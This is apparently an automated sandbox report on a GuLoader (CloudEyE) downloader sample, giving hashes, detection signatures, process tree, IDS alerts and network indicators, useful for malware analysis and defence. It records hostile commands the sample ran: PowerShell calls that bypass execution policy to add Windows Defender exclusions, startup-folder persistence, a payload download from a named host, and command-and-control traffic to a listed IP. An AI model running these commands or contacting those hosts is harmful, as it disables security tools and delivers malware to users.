
Windows Analysis Report
yVVZdG2NJX.exe

Overview

General Information

Sample name: yVVZdG2NJX.exe (renamed because original name is a hash value)
Original sample name: 18ea5087eb82e075ca35d2b2dcff9450.exe
Analysis ID: 1561885
MD5: 18ea5087eb82e075ca35d2b2dcff9450
SHA1: dc436fbaa777672d44a8b90b98c4a1c266885845
SHA256: a7247c64cc0168290ca3b210e59ef629b46f513205bc6562ec79cdd2cda71725
Tags: exe, user-abuse_ch

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • yVVZdG2NJX.exe (PID: 8068 cmdline: "C:\Users\user\Desktop\yVVZdG2NJX.exe" MD5: 18EA5087EB82E075CA35D2B2DCFF9450)
    • yVVZdG2NJX.exe (PID: 7796 cmdline: "C:\Users\user\Desktop\yVVZdG2NJX.exe" MD5: 18EA5087EB82E075CA35D2B2DCFF9450)
      • powershell.exe (PID: 5900 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 6512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1708 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'yVVZdG2NJX.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 656 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\yVVZdG2NJX.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 2224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.1554696495.00000000008BA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security |
00000000.00000002.1555288349.0000000004473000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
Process Memory Space: yVVZdG2NJX.exe PID: 8068 | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security |

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\yVVZdG2NJX.exe", ParentImage: C:\Users\user\Desktop\yVVZdG2NJX.exe, ParentProcessId: 7796, ParentProcessName: yVVZdG2NJX.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe', ProcessId: 5900, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\yVVZdG2NJX.exe", ParentImage: C:\Users\user\Desktop\yVVZdG2NJX.exe, ParentProcessId: 7796, ParentProcessName: yVVZdG2NJX.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe', ProcessId: 5900, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\yVVZdG2NJX.exe", ParentImage: C:\Users\user\Desktop\yVVZdG2NJX.exe, ParentProcessId: 7796, ParentProcessName: yVVZdG2NJX.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe', ProcessId: 5900, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\yVVZdG2NJX.exe, ProcessId: 7796, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yVVZdG2NJX.lnk
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\yVVZdG2NJX.exe", ParentImage: C:\Users\user\Desktop\yVVZdG2NJX.exe, ParentProcessId: 7796, ParentProcessName: yVVZdG2NJX.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe', ProcessId: 5900, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-24T16:37:41.543353+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49776 | 185.244.144.68 | 80 | TCP
2024-11-24T16:38:12.671473+0100 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49821 | 87.121.86.8 | 4020 | TCP

AV Detection

Source: C:\Users\user\AppData\Roaming\yVVZdG2NJX.exe | ReversingLabs: Detection: 42%
Source: yVVZdG2NJX.exe | ReversingLabs: Detection: 42%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\yVVZdG2NJX.exe | Joe Sandbox ML: detected
Source: yVVZdG2NJX.exe | Joe Sandbox ML: detected
Source: yVVZdG2NJX.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: yVVZdG2NJX.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Code function: 0_2_004065DA FindFirstFileW,FindClose,0_2_004065DA
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059A9
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Code function: 0_2_00402868 FindFirstFileW,0_2_00402868
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Code function: 3_2_00402868 FindFirstFileW,3_2_00402868
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Code function: 3_2_004065DA FindFirstFileW,FindClose,3_2_004065DA
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Code function: 3_2_004059A9 DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_004059A9

Networking

Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.10:49821 -> 87.121.86.8:4020
Source: global traffic | TCP traffic: 192.168.2.10:49821 -> 87.121.86.8:4020
Source: Joe Sandbox View | IP Address: 185.244.144.68
Source: Joe Sandbox View | ASN Name: SKATTV-ASBG
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.10:49776 -> 185.244.144.68:80
Source: global traffic | HTTP traffic detected:
  GET /SJatcRCUnkMIpuGcrVu155.bin HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
  Host: mertvinc.com.tr
  Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 87.121.86.8
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: mertvinc.com.tr
Source: powershell.exe, 0000000A.00000002.1823896104.00000000077D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000005.00000002.1748126062.0000000008205000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1833557916.0000000008756000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000005.00000002.1745481577.00000000072F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microv
Source: yVVZdG2NJX.exe, 00000003.00000002.2589172205.0000000004248000.00000004.00000020.00020000.00000000.sdmp, yVVZdG2NJX.exe, 00000003.00000002.2589611092.0000000005C70000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://mertvinc.com.tr/SJatcRCUnkMIpuGcrVu155.bin
Source: yVVZdG2NJX.exe, yVVZdG2NJX.exe.3.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000005.00000002.1743227140.00000000059A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1778393165.0000000006048000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1818382211.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000A.00000002.1806582406.0000000004CE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1740597554.0000000004A96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1769636888.0000000005136000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1806582406.0000000004CE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: yVVZdG2NJX.exe, 00000003.00000002.2609686663.00000000345A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1740597554.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1769636888.0000000004FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1806582406.0000000004B91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1740597554.0000000004A96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1769636888.0000000005136000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1806582406.0000000004CE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000A.00000002.1806582406.0000000004CE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000008.00000002.1785903689.0000000008A97000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000005.00000002.1740597554.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1769636888.0000000004FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1806582406.0000000004B91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000000A.00000002.1818382211.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.1818382211.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.1818382211.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.1806582406.0000000004CE6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000A.00000002.1806582406.00000000054B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1806582406.00000000052F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000005.00000002.1743227140.00000000059A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1778393165.0000000006048000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1818382211.0000000005BF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Code function: 0_2_0040543E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040543E
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Code function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | File created: C:\Windows\resources\0809
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Code function: String function: 00402C41 appears 49 times
Source: yVVZdG2NJX.exe, 00000003.00000002.2612931315.0000000036CE9000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs yVVZdG2NJX.exe
Source: yVVZdG2NJX.exe, 00000003.00000002.2589172205.000000000428A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs yVVZdG2NJX.exe
Source: classification engine | Classification label: mal100.troj.evad.winEXE@12/21@1/2
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Code function: 0_2_004046FF GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046FF
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Code function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_00402104
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Mutant created: \Sessions\1\BaseNamedObjects\ssjpS2lhbkGsnEgT
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2224:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6512:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | File created: C:\Users\user\AppData\Local\Temp\nsa8F08.tmp
Source: yVVZdG2NJX.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | File read: C:\Users\user\Desktop\yVVZdG2NJX.exe
Source: unknown | Process created: C:\Users\user\Desktop\yVVZdG2NJX.exe "C:\Users\user\Desktop\yVVZdG2NJX.exe"
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Process created: C:\Users\user\Desktop\yVVZdG2NJX.exe "C:\Users\user\Desktop\yVVZdG2NJX.exe"
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yVVZdG2NJX.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'yVVZdG2NJX.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\yVVZdG2NJX.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: riched20.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: usp10.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: msls31.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\yVVZdG2NJX.exe | Section loaded: rsaenh.dll
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: avicap32.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: msvfw32.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\yVVZdG2NJX.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
